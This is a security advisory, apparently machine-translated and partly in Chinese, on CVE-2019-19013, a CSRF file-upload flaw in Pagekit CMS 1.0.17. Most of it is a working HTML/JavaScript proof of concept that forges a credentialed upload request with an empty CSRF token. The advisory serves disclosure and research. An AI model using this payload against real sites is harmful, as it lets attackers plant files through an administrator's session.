Release Date: 2019-11-21
Updated: 2019-11-26
Affected Systems:
Pagekit Pagekit 1.0.17
description:
CVE (the CAN) ID: CVE-2019-19013
Pagekit is a modular, lightweight content management systems.
Pagekit 1.0.17 version, there is a CSRF vulnerability in implementations. By removing the tag from CSRF request, an attacker can exploit this vulnerability to upload arbitrary files.
<* Source: Vendor
*>
Test method:
WARNING
The following procedures (methods) may carry offensive, only for safety research and teaching purposes. Users own risk!
vendor ()提供了如下测试方法:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +
"Content-Type: image/jpeg\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"/\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"root\"\r\n" +
"\r\n" +
"storage\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +
"Content-Disposition: form-data; name=\"_csrf\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
< /html>
建议:
Manufacturers patch:
Pagekit
-------
currently no vendors provide patches or upgrades, we recommend that you use this software at any time concerned about the vendor's home page to get the latest version:
https://pagekit.com/
HTTPS: // packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html